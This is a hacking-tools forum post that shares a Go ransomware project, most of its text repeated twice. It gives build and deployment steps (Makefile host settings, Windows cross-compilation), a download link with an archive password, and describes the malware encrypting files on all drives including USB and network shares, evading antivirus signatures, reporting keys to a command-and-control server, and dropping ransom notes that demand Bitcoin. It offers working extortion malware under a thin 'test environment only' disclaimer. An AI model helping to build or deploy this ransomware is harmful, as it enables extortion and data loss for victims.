10 Years of Service
46%
Basically, it will encrypt your files in background using AES-256-CTR, a strong encryption algorithm, using RSA-4096 to secure the key exchange with server. Yeah, a Cryptolocker like malware.
It is composed of two main parts, the server and the malware itself.
The server is responsible for storing the Id and the respective encryption key and possibly act as a Command and Control server in the near future.
The malware encrypts with the key with an RSA-4096 public key before sending them to the server. This approach with the https transport together make the security and authentication almost unbreakable (in theory)
Features
How it Works:
The malware will run in background. You can see what is going on commenting the HIDDEN line on Makefile before build
By default, the server will listen on
The client will use this host as the default url too.
You can put the server on any domain and start it. Simply overwrite the SERVER_HOST and SERVER_PORT on Makefile before build and the malware will try to connect with this url instead
After build, a binary called ransomware.exe, server/server.exe and unlocker.exe will be generated on the bin folder. The execution of ransomware.exe and unlocker.exe (even if it is compiled for linux/darwin) is locked to windows machines only.
Feel free to edit the parameters across the files for testing. The most important parameters are defined in cmd/common.go and Makefile.
Put the binaries on a correct windows test environment and start the server. It will wait for the malware contact and persist the id/encryption keys
When double click on ransomware.exe it will run in background by default, walking interesting directories and encrypting all files that match the interesting file extensions using AES-256-CTR and a random IV for each file, recreating then with encrypted content and a custom extension(.encrypted by default) and create a READ_TO_DECRYPT.html and FILES_ENCRYPTED.html files on desktop.
In theory, to decrypt your files you need to send an amount of BTC to the attacker's wallet, followed by a contact sending your ID(located on the file created on desktop). If your payment was confirmed, the attacker possibly(or maybe not) will return your encryption key and the unlocker.exe and you can use then to recover your files. This exchange can be accomplished in several ways and WILL NOT be implemented in this project for obvious reasons.
Let's suppose you get your encryption key back, you can retrieve it pointing to the following url:
curl -k
Where :id is your identification stored in the file on desktop. After, run the unlocker.exe by double click and follow the instructions.
Download:
[HIDE-THANKS]
Link:https://github.com/mauri870/ransomware
[/HIDE-THANKS]
If you like build the server for windows from a unix machine, run env GOOS=windows make.
DON'T RUN ransomware.exe IN YOUR PERSONAL MACHINE, EXECUTE ONLY IN A TEST ENVIRONMENT!
Download:
[HIDE-THANKS]
[/HIDE-THANKS]
Password:
level23hacktools.com
It is composed of two main parts, the server and the malware itself.
The server is responsible for storing the Id and the respective encryption key and possibly act as a Command and Control server in the near future.
The malware encrypts with the key with an RSA-4096 public key before sending them to the server. This approach with the https transport together make the security and authentication almost unbreakable (in theory)
Features
- Run in Background (or not)
- Encrypts files using AES-256-CTR(Counter Mode) with random IV for each file
- Without virus signature (at the moment)
- Use RSA-4096 to secure the authenticity
- HTTPS and HTTP\2 Transport by default
- Stream encryption to avoid load an entire file into memory
- Walk all drives by default, including usb's and network locations
- Lock registry entry with hash digest(maybe SHA-256) to identify an infected victim
- Tor or other approach to hide the connection with the C&C see issue 3
- Docker image for compilation
How it Works:
The malware will run in background. You can see what is going on commenting the HIDDEN line on Makefile before build
By default, the server will listen on
This link is hidden for visitors. Please Log in or register now.
You can put the server on any domain and start it. Simply overwrite the SERVER_HOST and SERVER_PORT on Makefile before build and the malware will try to connect with this url instead
After build, a binary called ransomware.exe, server/server.exe and unlocker.exe will be generated on the bin folder. The execution of ransomware.exe and unlocker.exe (even if it is compiled for linux/darwin) is locked to windows machines only.
Feel free to edit the parameters across the files for testing. The most important parameters are defined in cmd/common.go and Makefile.
Put the binaries on a correct windows test environment and start the server. It will wait for the malware contact and persist the id/encryption keys
When double click on ransomware.exe it will run in background by default, walking interesting directories and encrypting all files that match the interesting file extensions using AES-256-CTR and a random IV for each file, recreating then with encrypted content and a custom extension(.encrypted by default) and create a READ_TO_DECRYPT.html and FILES_ENCRYPTED.html files on desktop.
In theory, to decrypt your files you need to send an amount of BTC to the attacker's wallet, followed by a contact sending your ID(located on the file created on desktop). If your payment was confirmed, the attacker possibly(or maybe not) will return your encryption key and the unlocker.exe and you can use then to recover your files. This exchange can be accomplished in several ways and WILL NOT be implemented in this project for obvious reasons.
Let's suppose you get your encryption key back, you can retrieve it pointing to the following url:
curl -k
This link is hidden for visitors. Please Log in or register now.
Where :id is your identification stored in the file on desktop. After, run the unlocker.exe by double click and follow the instructions.
Download:
[HIDE-THANKS]
Link:https://github.com/mauri870/ransomware
[/HIDE-THANKS]
If you like build the server for windows from a unix machine, run env GOOS=windows make.
DON'T RUN ransomware.exe IN YOUR PERSONAL MACHINE, EXECUTE ONLY IN A TEST ENVIRONMENT!
Download:
[HIDE-THANKS]
This link is hidden for visitors. Please Log in or register now.
Password:
level23hacktools.com
Last edited by a moderator:
